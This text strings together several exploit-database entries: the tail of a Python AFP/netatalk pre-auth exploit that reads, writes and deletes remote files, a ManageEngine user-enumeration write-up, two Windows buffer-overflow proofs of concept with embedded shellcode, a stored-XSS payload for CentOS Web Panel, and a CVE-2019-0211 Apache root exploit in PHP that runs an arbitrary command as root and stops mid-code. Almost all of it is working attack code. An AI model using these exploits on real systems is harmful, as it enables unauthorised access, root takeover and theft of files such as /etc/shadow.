  data += '\xef\xbe\xad\xde' # overwrites datasize
  data += '\xfe\xca\x1d\xc0' # overwrites server_quantum 
  data += '\xce\xfa\xed\xfe' # overwrites the server id and client id
  data += preauth_switch_base # overwrite the commands ptr
  sock.sendall(data)

  # don't really care about the respone
  resp = sock.recv(1024)
  return


##
# Sends a request to the server.
#
# @param socket the socket we are writing on
# @param request_id two bytes. requests are tracked through the session
# @param address the address that we want to jump to
# @param param_string the params that the address will need
##
def send_request(socket, request_id, address, param_string):
    data = '\x00' # flags
    data += '\x02' # command
    data += request_id
    data += '\x00\x00\x00\x00' # data offset
    data += '\x00\x00\x00\x90' # cmd length <=== always the same
    data += '\x00\x00\x00\x00' # reserved
    # ==== below gets copied into dsi->cmd =====
    data += '\x11' # use the 25th entry in the pre_auth table. We'll write the function to execute there
    data += '\x00' # pad
    if (param_string == False):
        data += ("\x00" * 134)
    else:
        data += param_string
        data += ("\x00" * (134 - len(param_string)))

    data += address # we'll jump to this address

    sock.sendall(data)
    return

##
# Parses the DSI header. If we don't get the expected request id
# then we bail out.
##
def parse_dsi(payload, expected_req_id):
  (flags, command, req_id, error_code, length, reserved) = struct.unpack_from('>BBHIII', payload)
  if command != 8:
    if flags != 1 or command != 2 or req_id != expected_req_id:
      print '[-] Bad DSI Header: %u %u %u' % (flags, command, req_id)
      sys.exit(0)

    if error_code != 0 and error_code != 4294962287:
      print '[-] The server responded to with an error code: ' + str(error_code)
      sys.exit(0)

  afp_data = payload[16:]
  if len(afp_data) != length:
    if command != 8:
      print '[-] Invalid length in DSI header: ' + str(length) + ' vs. ' + str(len(payload))
      sys.exit(0)
    else:
      afp_data = afp_data[length:]
      afp_data = parse_dsi(afp_data, expected_req_id)

  return afp_data

##
# List all the volumes on the remote server
##
def list_volumes(sock):
  print "[+] Listing volumes"
  send_request(sock, "\x00\x01", afp_getsrvrparms, "")
  resp = sock.recv(1024)

  afp_data = parse_dsi(resp, 1)
  (server_time, volumes) = struct.unpack_from('>IB', afp_data)
  print "[+] " + str(volumes) + " volumes are available:"

  afp_data = afp_data[5:]
  for i in range(volumes):
    string_length = struct.unpack_from('>h', afp_data)
    name = afp_data[2 : 2 + string_length[0]]
    print "\t-> " + name
    afp_data = afp_data[2 + string_length[0]:]

  return

##
# Open a volume on the remote server
##
def open_volume(sock, request, params):
  send_request(sock, request, afp_openvol, params)
  resp = sock.recv(1024)

  afp_data = parse_dsi(resp, 1)
  (bitmap, vid) = struct.unpack_from('>HH', afp_data)
  return vid

##
# List the contents of a specific volume
##
def list_volume_content(sock, name):
  print "[+] Listing files in volume " + name

  # open the volume
  length = struct.pack("b", len(name))
  vid = open_volume(sock, "\x00\x01", "\x00\x20" + length + name)
  print "[+] Volume ID is " + str(vid)

  # enumerate
  packed_vid = struct.pack(">h", vid)
  send_request(sock, "\x00\x02", afp_enumerate_ext2, packed_vid + "\x00\x00\x00\x02\x01\x40\x01\x40\x07\xff\x00\x00\x00\x01\x7f\xff\xff\xff\x02\x00\x00\x00")
  resp = sock.recv(1024)

  afp_data = parse_dsi(resp, 2)
  (f_bitmap, d_bitmap, req_count) = struct.unpack_from('>HHH', afp_data)
  afp_data = afp_data[6:]

  print "[+] Files (%u):" % req_count
  for i in range(req_count):
    (length, is_dir, pad, something, file_id, name_length) = struct.unpack_from('>HBBHIB', afp_data)
    name = afp_data[11:11+name_length]
    if is_dir:
      print "\t[%u] %s/" % (file_id, name)
    else:
      print "\t[%u] %s" % (file_id, name)
    afp_data = afp_data[length:]

##
# Read the contents of a specific file.
##
def cat_file(sock, vol_name, file_name):
  print "[+] Cat file %s in volume %s" % (file_name, vol_name)

  # open the volume
  vol_length = struct.pack("b", len(vol_name))
  vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
  print "[+] Volume ID is " + str(vid)

  # open fork
  packed_vid = struct.pack(">h", vid)
  file_length = struct.pack("b", len(file_name))
  send_request(sock, "\x00\x02", afp_openfork, packed_vid + "\x00\x00\x00\x02\x00\x00\x00\x03\x02" + file_length + file_name)
  resp = sock.recv(1024)

  afp_data = parse_dsi(resp, 2)
  (f_bitmap, fork_id) = struct.unpack_from('>HH', afp_data)
  print "[+] Fork ID: %s" % (fork_id)

  # read file
  packed_fork = struct.pack(">h", fork_id)
  send_request(sock, "\x00\x03", afp_read_ext, packed_fork + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + "\x00\x00\x03\x00")
  resp = sock.recv(1024)

  afp_data = parse_dsi(resp, 3)
  print "[+] File contents:"
  print afp_data

##
# Create a file on the remote volume
## 
def write_file(sock, vol_name, file_name, data):
  print "[+] Writing to %s in volume %s" % (file_name, vol_name)

  # open the volume
  vol_length = struct.pack("B", len(vol_name))
  vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
  print "[+] Volume ID is " + str(vid)

  # create the file
  packed_vid = struct.pack(">H", vid)
  file_length = struct.pack("B", len(file_name))
  send_request(sock, "\x00\x02", afp_createfile, packed_vid + "\x00\x00\x00\x02\x02" + file_length + file_name);
  resp = sock.recv(1024)
  afp_data = parse_dsi(resp, 2)

  if len(afp_data) != 0:
    sock.recv(1024)

  # open fork
  packed_vid = struct.pack(">H", vid)
  file_length = struct.pack("B", len(file_name))
  send_request(sock, "\x00\x03", afp_openfork, packed_vid + "\x00\x00\x00\x02\x00\x00\x00\x03\x02" + file_length + file_name)
  resp = sock.recv(1024)

  afp_data = parse_dsi(resp, 3)
  (f_bitmap, fork_id) = struct.unpack_from('>HH', afp_data)
  print "[+] Fork ID: %s" % (fork_id)

  # write
  packed_fork = struct.pack(">H", fork_id)
  data_length = struct.pack(">Q", len(data))
  send_request(sock, "\x00\x04", afp_write_ext, packed_fork + "\x00\x00\x00\x00" + "\x00\x00\x00\x00" + data_length + data)
  #resp = sock.recv(1024)

  sock.send(data + ("\x0a"*(144 - len(data))))
  resp = sock.recv(1024)
  afp_data = parse_dsi(resp, 4)
  print "[+] Fin"

##
# Delete a file on the remote volume
##
def delete_file(sock, vol_name, file_name):
  print "[+] Deleting %s from volume %s" % (file_name, vol_name)

  # open the volume
  vol_length = struct.pack("B", len(vol_name))
  vid = open_volume(sock, "\x00\x01", "\x00\x20" + vol_length + vol_name)
  print "[+] Volume ID is " + str(vid)

  # delete the file
  packed_vid = struct.pack(">H", vid)
  file_length = struct.pack("B", len(file_name))
  send_request(sock, "\x00\x02", afp_delete, packed_vid + "\x00\x00\x00\x02\x02" + file_length + file_name);
  resp = sock.recv(1024)
  afp_data = parse_dsi(resp, 2)

  print "[+] Fin"

##
##
## Main
##
##

top_parser = argparse.ArgumentParser(description='I\'m a little pea. I love the sky and the trees.')
top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to")
top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="548")
top_parser.add_argument('-lv', '--list-volumes', action="store_true", dest="lv", help="List the volumes on the remote target.")
top_parser.add_argument('-lvc', '--list-volume-content', action="store_true", dest="lvc", help="List the content of a volume.")
top_parser.add_argument('-c', '--cat', action="store_true", dest="cat", help="Dump contents of a file.")
top_parser.add_argument('-w', '--write', action="store_true", dest="write", help="Write to a new file.")
top_parser.add_argument('-f', '--file', action="store", dest="file", help="The file to operate on")
top_parser.add_argument('-v', '--volume', action="store", dest="volume", help="The volume to operate on")
top_parser.add_argument('-d', '--data', action="store", dest="data", help="The data to write to the file")
top_parser.add_argument('-df', '--delete-file', action="store_true", dest="delete_file", help="Delete a file")
args = top_parser.parse_args()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
sock.connect((args.ip, args.port))
print "[+] Connected!"

do_exploit(sock)
if args.lv:
  list_volumes(sock)
elif args.lvc and args.volume != None:
  list_volume_content(sock, args.volume)
elif args.cat and args.file != None and args.volume != None:
  cat_file(sock, args.volume, args.file)
elif args.write and args.volume != None and args.file != None and args.data != None:
  if len(args.data) > 144:
    print "This implementation has a max file writing size of 144"
    sys.exit(0)
  write_file(sock, args.volume, args.file, args.data)
elif args.delete_file and args.volume != None and args.file != None:
  delete_file(sock, args.volume, args.file)
else:
  print("Bad args")

sock.close()

# Exploit Title: ManageEngine ServiceDesk Plus - 9.3 User enumeration vulnerability
# Date: /03/29/2019
# Exploit Author: Alexander Bluestein
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/service-desk/download.html
# Version: 9.3
# Tested on: Ubuntu Linux
# CVE : CVE-2019-10273


ManageEngine ServiceDesk Plus - 9.3 User enumeration vulnerability
----------------------------------------------------------------------------------------

Overview:
CVE-2019-10273 is a information leakage vulnerability within the ManageEngine ServiceDesk Plus 9.3 software, this vulnerability allows for the enumeration of active users that are registered on the ServiceDesk 9.3 hosted software.

Due to a flaw within the way the authentication is handled, an attacked is able to login and verify any active account.

---------------------------------------------------------------

Steps to reproduce: These steps can also be used to exploit authentication to privilege escalate into a higher level account via authentication bypass. (More info about authentication can be found with CVE-2019-10008)

- Start with logging into the guest account on the login page http://examplesite.com:8080, this will allow the first set of authentication to take place. (An attacker can use the guest credentials, this can be any low level user, or even the default applications credentials, Username: guest Password:guest)
- Navigate to the mobile login form located at http://examplesite.com:8080/mc, you will see that you have automatically be authenticated with whichever account you decided to previously login with.
- Logout of the mobile form at http://examplesite.com:8080/mc

- Re-login with any username, and the application will see that you have already been authenticated and it will not require a valid password.
- If you are able to successfully be automatically authenticated, you can confirm that the user is an active user within the service.
- You may now intercept and capture the login request with Burp Suite to set up a bruteforce attack, the http://examplesite.com:8080/mc will not try and prevent a barrage of requests. There is no protection set up within the services application

Conclusion:

Through the exploitation of the way that the application handles user authentication, an attacker is given the ability to bruteforce and confirm any active users on the service.

---------------------------------------------------------------

Impact and larger implication:

User enumeration is where an attacker is able to use a dictionary / bruteforce attack to guess or confirm valid and active users within the system. This is classified as a web application user enumeration vulnerability.

The impact that the vulnerability CVE-2019-10273 may have. It will allow an attacker to remotely enumerate all the users that are actively registered. This can lead to attacking specific accounts or targeting higher level accounts in order to privilege escalate on the service. Being able to verify whether or not a specific username is valid within a service can be detrimental to the users on the service.

---------------------------------------------------------------

References and other information

Utilizing CVE-2019-10008 we are able to bypass the login, CVE-2019-10273 further exploits the user authentication bug which is found within the ManageEngine 9.3 application. More information regarding CVE-2019-10008 can be found at http://flameofignis.com/2019/03/30/ServiceDesk-9-3-Auth-Bypass-CVE-2019-10008/ (The authors of CVE-2019-10008 are Ata Hakçıl, Melih Kaan Yıldız)

The ManageEngine ServiceDesk 9.3 software can be found at https://www.manageengine.com/products/service-desk/download.html

#!/usr/bin/python -w

#
# Exploit Author: Chris Au
# Exploit Title:  River Past Cam Do 3.7.6 Local Buffer Overflow in Activation Code
# Date: 07-04-2019
# Vulnerable Software: River Past Cam Do 3.7.6
# Vendor Homepage: http://www.flexhex.com
# Version: 3.7.6
# Software Link: https://en.softonic.com/download/river-past-cam-do/windows/post-download?sl=1
# Tested Windows Windows XP SP3 EN
#
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open Cam Do
# 3. the application will ask you to input the activation code in order to activate it
# 4. paste contents from clipboard in the "Activation code"
# 5. select Activate
# 6. calc.exe
#

filename="evil.txt"
junk = "A" * 608
nseh = "\xeb\x09\x90\x90"
seh = "\x0e\x7d\x01\x10" ##pop pop ret rvddshow2.dll  

jmp = (
"\x58"
"\xff\xe0"
"\xe8\xf8\xff\xff\xff"
)
#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0e\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xa4\xa6\xa8\xb8\xbc\xbd\xbe" BufferRegister=EAX -f c

shellcode = (
"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
"\x4c\x5a\x48\x4b\x32\x35\x50\x33\x30\x33\x30\x55\x30\x4d\x59"
"\x4a\x45\x30\x31\x59\x50\x43\x54\x4c\x4b\x56\x30\x36\x50\x4c"
"\x4b\x50\x52\x54\x4c\x4c\x4b\x50\x52\x42\x34\x4c\x4b\x53\x42"
"\x31\x38\x44\x4f\x38\x37\x51\x5a\x37\x56\x30\x31\x4b\x4f\x4e"
"\x4c\x47\x4c\x45\x31\x53\x4c\x35\x52\x46\x4c\x37\x50\x49\x51"
"\x58\x4f\x44\x4d\x53\x31\x59\x57\x4a\x42\x5a\x52\x51\x42\x50"
"\x57\x4c\x4b\x36\x32\x52\x30\x4c\x4b\x31\x5a\x57\x4c\x4c\x4b"
"\x30\x4c\x54\x51\x43\x48\x4d\x33\x30\x48\x45\x51\x58\x51\x46"
"\x31\x4c\x4b\x51\x49\x57\x50\x55\x51\x48\x53\x4c\x4b\x57\x39"
"\x44\x58\x4d\x33\x56\x5a\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x33"
"\x31\x58\x56\x36\x51\x4b\x4f\x4e\x4c\x49\x51\x58\x4f\x44\x4d"
"\x53\x31\x58\x47\x37\x48\x4d\x30\x32\x55\x5a\x56\x33\x33\x53"
"\x4d\x5a\x58\x37\x4b\x33\x4d\x47\x54\x33\x45\x4a\x44\x50\x58"
"\x4c\x4b\x50\x58\x56\x44\x45\x51\x38\x53\x52\x46\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x50\x58\x35\x4c\x43\x31\x49\x43\x4c\x4b"
"\x45\x54\x4c\x4b\x53\x31\x4e\x30\x4b\x39\x47\x34\x46\x44\x51"
"\x34\x31\x4b\x31\x4b\x35\x31\x50\x59\x30\x5a\x36\x31\x4b\x4f"
"\x4d\x30\x31\x4f\x51\x4f\x51\x4a\x4c\x4b\x44\x52\x4a\x4b\x4c"
"\x4d\x51\x4d\x53\x5a\x43\x31\x4c\x4d\x4c\x45\x38\x32\x35\x50"
"\x55\x50\x55\x50\x56\x30\x43\x58\x56\x51\x4c\x4b\x42\x4f\x4b"
"\x37\x4b\x4f\x58\x55\x4f\x4b\x5a\x50\x48\x35\x39\x32\x51\x46"
"\x55\x38\x39\x36\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x49\x45\x47"
"\x4c\x33\x36\x33\x4c\x44\x4a\x4b\x30\x4b\x4b\x4b\x50\x33\x45"
"\x33\x35\x4f\x4b\x30\x47\x54\x53\x32\x52\x42\x4f\x32\x4a\x43"
"\x30\x56\x33\x4b\x4f\x38\x55\x32\x43\x55\x31\x42\x4c\x53\x53"
"\x46\x4e\x52\x45\x33\x48\x52\x45\x33\x30\x41\x41")
buffer = junk + nseh + seh + jmp + shellcode
buffer += "C" * (5000-len(buffer))
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

#!/usr/bin/python -w

#
# Exploit Author: Chris Au
# Exploit Title:  AllPlayer V7.4 - Local Buffer Overflow (SEH Unicode)
# Date: 07-04-2019
# Vulnerable Software: AllPlayer V7.4
# Vendor Homepage: https://www.allplayer.org/
# Version: 7.4
# Software Link: http://allplayer.org/Download/ALLPlayerEN.exe
# Tested Windows Windows 7 SP1 x86
#
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open AllPlayer
# 3. select "Open video or audio file", click "Open URL"
# 4. paste contents from clipboard
# 5. select OK
# 6. calc.exe
#

filename="evil.txt"
header = "http://"
junk = "\xcc" * 301
nseh = "\x90\x45"
seh = "\x7a\x74" #pop pop retn
valign = (
"\x55" #push ebp
"\x45" #align
"\x58" #pop eax
"\x45" #align
"\x05\x20\x11" #add eax,11002000
"\x45" #align
"\x2d\x18\x11" #sub eax,11001900
"\x45" #align
"\x50" #push eax
"\x45" #align
"\xc3" #retn
)
#nop to shell
nop = "\xcc" * 115
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
"Lnc51hOuipAA")
fill = "\x45" * 5000
buffer = header + junk + nseh + seh + valign + nop + shellcode + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

# Exploit Title: CentOS Web Panel v0.9.8.793 (Free) and v0.9.8.753 (Pro) - Email Field Stored Cross-Site Scripting Vulnerability
# Google Dork: N/A
# Date: 06 - April - 2019
# Exploit Author: DKM
# Vendor Homepage: http://centos-webpanel.com
# Software Link: http://centos-webpanel.com
# Version: v0.9.8.793 (Free) and v0.9.8.753 (Pro)
# Tested on: CentOS 7
# CVE : CVE-2019-10893

# Description:
CentOS-WebPanel.com (aka CWP) CentOS Web Panel v0.9.8.793 (Free/Open Source Version) and v0.9.8.753 (Pro) is vulnerable to Stored/Persistent XSS for Admin Email fields on the "CWP Settings > "Edit Settings" screen. By changing the email ID to any XSS Payload and clicking on Save Changes, the XSS Payload will execute.

# Steps to Reproduce:
1. Login into the CentOS Web Panel using admin credential.
2. From Navigation Click on "CWP Settings then Click on "Edit Settings"
3. In "Email Address" field give simple payload as: <script>alert(1)</script> and Click Save Changes
4. Now one can see that the XSS Payload executed.
5. The application does not properly sanitize the user input even does not validation/check the user input is valid email id or not.

<?php
# CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation
# Charles Fol
# @cfreal_
# 2019-04-08
#
# INFOS
#
# https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html
#
# USAGE
#
# 1. Upload exploit to Apache HTTP server
# 2. Send request to page
# 3. Await 6:25AM for logrotate to restart Apache
# 4. python3.5 is now suid 0
#
# You can change the command that is ran as root using the cmd HTTP
# parameter (GET/POST).
# Example: curl http://localhost/carpediem.php?cmd=cp+/etc/shadow+/tmp/
#
# SUCCESS RATE
#
# Number of successful and failed exploitations relative to of the number
# of MPM workers (i.e. Apache subprocesses). YMMV.
#
# W  --% S   F
#  5 87% 177 26 (default)
#  8 89%  60  8
# 10 95%  70  4
#
# More workers, higher success rate.
# By default (5 workers), 87% success rate. With huge HTTPds, close to 100%.
# Generally, failure is due to all_buckets being relocated too far from its
# original address.
#
# TESTED ON
#
# - Apache/2.4.25
# - PHP 7.2.12
# - Debian GNU/Linux 9.6
#
# TESTING
#
# $ curl http://localhost/cfreal-carpediem.php
# $ sudo /usr/sbin/logrotate /etc/logrotate.conf --force
# $ ls -alh /usr/bin/python3.5
# -rwsr-sr-x 2 root root 4.6M Sep 27  2018 /usr/bin/python3.5
#
# There are no hardcoded addresses.
# - Addresses read through /proc/self/mem
# - Offsets read through ELF parsing
#
# As usual, there are tons of comments.
#


o('CARPE (DIEM) ~ CVE-2019-0211');
o('');

error_reporting(E_ALL);


# Starts the exploit by triggering the UAF.
function real()
{
  global $y;
  $y = [new Z()];
  json_encode([0 => &$y]);
}

# In order to read/write what comes after in memory, we need to UAF a string so
# that we can control its size and make in-place edition.
# An easy way to do that is to replace the string by a timelib_rel_time
# structure of which the first bytes can be reached by the (y, m, d, h, i, s)
# properties of the DateInterval object.
#
# Steps:
# - Create a base object (Z)
# - Add string property (abc) so that sizeof(abc) = sizeof(timelib_rel_time)
# - Create DateInterval object ($place) meant to be unset and filled by another
# - Trigger the UAF by unsetting $y[0], which is still reachable using $this
# - Unset $place: at this point, if we create a new DateInterval object, it will
#   replace $place in memory
# - Create a string ($holder) that fills $place's timelib_rel_time structure
# - Allocate a new DateInterval object: its timelib_rel_time structure will
#   end up in place of abc
# - Now we can control $this->abc's zend_string structure entirely using
#   y, m, d etc.
# - Increase abc's size so that we can read/write memory that comes after it,
#   especially the shared memory block
# - Find out all_buckets' position by finding a memory region that matches the
#   mutex->meth structure
# - Compute the bucket index required to reach the SHM and get an arbitrary
#   function call
# - Scan ap_scoreboard_image->parent[] to find workers' PID and replace the
#   bucket
class Z implements JsonSerializable
{
  public function jsonSerialize()
  {
    global $y, $addresses, $workers_pids;

    #
    # Setup memory
    #
        o('Triggering UAF');
    o('  Creating room and filling empty spaces');

    # Fill empty blocks to make sure our allocations will be contiguous
    # I: Since a lot of allocations/deallocations happen before the script
    # is ran, two variables instanciated at the same time might not be
    # contiguous: this can be a problem for a lot of reasons.
    # To avoid this, we instanciate several DateInterval objects. These
    # objects will fill a lot of potentially non-contiguous memory blocks,
    # ensuring we get "fresh memory" in upcoming allocations.
    $contiguous = [];
    for($i=0;$i<10;$i++)
      $contiguous[] = new DateInterval('PT1S');

    # Create some space for our UAF blocks not to get overwritten
    # I: A PHP object is a combination of a lot of structures, such as
    # zval, zend_object, zend_object_handlers, zend_string, etc., which are
    # all allocated, and freed when the object is destroyed.
    # After the UAF is triggered on the object, all the structures that are
    # used to represent it will be marked as free.
    # If we create other variables afterwards, those variables might be
    # allocated in the object's previous memory regions, which might pose
    # problems for the rest of the exploitation.
    # To avoid this, we allocate a lot of objects before the UAF, and free
    # them afterwards. Since PHP's heap is LIFO, when we create other vars,
    # they will take the place of those objects instead of the object we
    # are triggering the UAF on. This means our object is "shielded" and
    # we don't have to worry about breaking it.
    $room = [];
    for($i=0;$i<10;$i++)
      $room[] = new Z();

    # Build string meant to fill old DateInterval's timelib_rel_time
    # I: ptr2str's name is unintuitive here: we just want to allocate a
    # zend_string of size 78.
    $_protector = ptr2str(0, 78);

    o('  Allocating $abc and $p');

    # Create ABC
    # I: This is the variable we will use to R/W memory afterwards.
    # After we free the Z object, we'll make sure abc is overwritten by a
    # timelib_rel_time structure under our control. The first 8*8 = 64 bytes
    # of this structure can be modified easily, meaning we can change the
    # size of abc. This will allow us to read/write memory after abc.
    $this->abc = ptr2str(0, 79);

    # Create $p meant to protect $this's blocks
    # I: Right after we trigger the UAF, we will unset $p.
    # This means that the timelib_rel_time structure (TRT) of this object
    # will be freed. We will then allocate a string ($protector) of the same
    # size as TRT. Since PHP's heap is LIFO, the string will take the place
    # of the now-freed TRT in memory.
    # Then, we create a new DateInterval object ($x). From the same
    # assumption, every structure constituting this new object will take the
    # place of the previous structure. Nevertheless, since TRT's memory
    # block has already been replaced by $protector, the new TRT will be put
    # in the next free blocks of the same size, which happens to be $abc
    # (remember, |abc| == |timelib_rel_time|).
    # We now have the following situation: $x is a DateInterval object whose
    # internal TRT structure has the same address as $abc's zend_string.
    $p = new DateInterval('PT1S');

    #
    # Trigger UAF
    #

    o('  Unsetting both variables and setting $protector');
    # UAF here, $this is usable despite being freed
    unset($y[0]);
    # Protect $this's freed blocks
    unset($p);

    # Protect $p's timelib_rel_time structure
    $protector = ".$_protector";
    # !!! This is only required for apache
    # Got no idea as to why there is an extra deallocation (?)
    $room[] = "!$_protector";

    o('  Creating DateInterval object');
    # After this line:
    # &((php_interval_obj) x).timelib_rel_time == ((zval) abc).value.str
    # We can control the structure of $this->abc and therefore read/write
    # anything that comes after it in memory by changing its size and
    # making in-place edits using $this->abc[$position] = $char
    $x = new DateInterval('PT1S');
    # zend_string.refcount = 0
    # It will get incremented at some point, and if it is > 1,
    # zend_assign_to_string_offset() will try to duplicate it before making
    # the in-place replacement
    $x->y = 0x00;
    # zend_string.len
    $x->d = 0x100;
    # zend_string.val[0-4]
    $x->h = 0x13121110;

    # Verify UAF was successful
    # We modified stuff via $x; they should be visible by $this->abc, since
    # they are at the same memory location.
    if(!(
      strlen($this->abc) === $x->d &&
      $this->abc[0] == "\x10"&&
      $this->abc[1] == "\x11"&&
      $this->abc[2] == "\x12"&&
      $this->abc[3] == "\x13"
    ))
    {
      o('UAF failed, exiting.');
      exit();
    }
    o('UAF successful.');
    o('');

    # Give us some room
    # I: As indicated before, just unset a lot of stuff so that next allocs
    # don't break our fragile UAFd structure.
    unset($room);

    #
    # Setup the R/W primitive
    #

    # We control $abc's internal zend_string structure, therefore we can R/W
    # the shared memory block (SHM), but for that we need to know the
    # position of $abc in memory
    # I: We know the absolute position of the SHM, so we need to need abc's
    # as well, otherwise we cannot compute the offset

    # Assuming the allocation was contiguous, memory looks like this, with
    # 0x70-sized fastbins:
    #   [zend_string:abc]
    #   [zend_string:protector]
    #   [FREE#1]
    #   [FREE#2]
    # Therefore, the address of the 2nd free block is in the first 8 bytes
    # of the first block: 0x70 * 2 - 24
    $address = str2ptr($this->abc, 0x70 * 2 - 24);
    # The address we got points to FREE#2, hence we're |block| * 3 higher in
    # memory
    $address = $address - 0x70 * 3;
    # The beginning of the string is 24 bytes after its origin
    $address = $address + 24;
    o('Address of $abc: 0x' . dechex($address));
    o('');

    # Compute the size required for our string to include the whole SHM and
    # apache's memory region
    $distance = 
      max($addresses['apache'][1], $addresses['shm'][1]) -
      $address
    ;
    $x->d = $distance;

    # We can now read/write in the whole SHM and apache's memory region.

    #
    # Find all_buckets in memory
    #

    # We are looking for a structure s.t.
    # |all_buckets, mutex| = 0x10
    # |mutex, meth| = 0x8
    # all_buckets is in apache's memory region
    # mutex is in apache's memory region
    # meth is in libaprR's memory region
    # meth's function pointers are in libaprX's memory region
    o('Looking for all_buckets in memory');
    $all_buckets = 0;

    for(
      $i = $addresses['apache'][0] + 0x10;
      $i < $addresses['apache'][1] - 0x08;
      $i += 8
    )
    {
      # mutex
      $mutex = $pointer = str2ptr($this->abc, $i - $address);
      if(!in($pointer, $addresses['apache']))
        continue;


      # meth
      $meth = $pointer = str2ptr($this->abc, $pointer + 0x8 - $address);
      if(!in($pointer, $addresses['libaprR']))
        continue;

      o('  [&mutex]: 0x' . dechex($i));
      o('    [mutex]: 0x' . dechex($mutex));
      o('      [meth]: 0x' . dechex($meth));


      # meth->*
      # flags
      if(str2ptr($this->abc, $pointer - $address) != 0)
        continue;
      # methods
      for($j=0;$j<7;$j++)
      {
        $m = str2ptr($this->abc, $pointer + 0x8 + $j * 8 - $address);
        if(!in($m, $addresses['libaprX']))
          continue 2;
        o('        [*]: 0x' . dechex($m));
      }

      $all_buckets = $i - 0x10;
      o('all_buckets = 0x' . dechex($all_buckets));
      break;
    }

    if(!$all_buckets)
    {
      o('Unable to find all_buckets');
      exit();
    }

    o('');

    # The address of all_buckets will change when apache is gracefully
    # restarted. This is a problem because we need to know all_buckets's
    # address in order to make all_buckets[some_index] point to a memory
    # region we control.

    #
    # Compute potential bucket indexes and their addresses
    #

        o('Computing potential bucket indexes and addresses');

    # Since we have sizeof($workers_pid) MPM workers, we can fill the rest
    # of the ap_score_image->servers items, so 256 - sizeof($workers_pids),
    # with data we like. We keep the one at the top to store our payload.
    # The rest is sprayed with the address of our payload.

    $size_prefork_child_bucket = 24;
    $size_worker_score = 264;
    # I get strange errors if I use every "free" item, so I leave twice as
    # many items free. I'm guessing upon startup some
    $spray_size = $size_worker_score * (256 - sizeof($workers_pids) * 2);
    $spray_max = $addresses['shm'][1];
    $spray_min = $spray_max - $spray_size;

    $spray_middle = (int) (($spray_min + $spray_max) / 2);
    $bucket_index_middle = (int) (
      - ($all_buckets - $spray_middle) /
      $size_prefork_child_bucket
    );

    #
    # Build payload
    #

    # A worker_score structure was kept empty to put our payload in
    $payload_start = $spray_min - $size_worker_score;

    $z = ptr2str(0);

      # Payload maxsize 264 - 112 = 152
    # Offset 8 cannot be 0, but other than this you can type whatever
    # command you want
      $bucket = isset($_REQUEST['cmd']) ?
        $_REQUEST['cmd'] :
"chmod +s /usr/bin/python3.5";

      if(strlen($bucket) > $size_worker_score - 112)
    {
      o(
'Payload size is bigger than available space (' .
        ($size_worker_score - 112) .
'), exiting.'
      );
      exit();
    }
      # Align
      $bucket = str_pad($bucket, $size_worker_score - 112, "\x00");

      # apr_proc_mutex_unix_lock_methods_t
    $meth = 
        $z .
        $z .
        $z .
        $z .
        $z .
        $z .
      # child_init
        ptr2str($addresses['zend_object_std_dtor'])
    ;

    # The second pointer points to meth, and is used before reaching the
    # arbitrary function call
    # The third one and the last one are both used by the function call
    # zend_object_std_dtor(object) => ... => system(&arData[0]->val)
    $properties = 
      # refcount
      ptr2str(1) .
      # u-nTableMask meth
      ptr2str($payload_start + strlen($bucket)) .
      # Bucket arData
      ptr2str($payload_start) .
      # uint32_t nNumUsed;
      ptr2str(1, 4) .
        # uint32_t nNumOfElements;
      ptr2str(0, 4) .
      # uint32_t nTableSize
      ptr2str(0, 4) .
      # uint32_t nInternalPointer
      ptr2str(0, 4) .
      # zend_long nNextFreeElement
      $z .
      # dtor_func_t pDestructor
      ptr2str($addresses['system'])
    ;

    $payload =
      $bucket .
      $meth .
      $properties
    ;

    # Write the payload

    o('Placing payload at address 0x' . dechex($payload_start));

    $p = $payload_start - $address;
    for(
      $i = 0;
      $i < strlen($payload);
      $i++
    )
    {
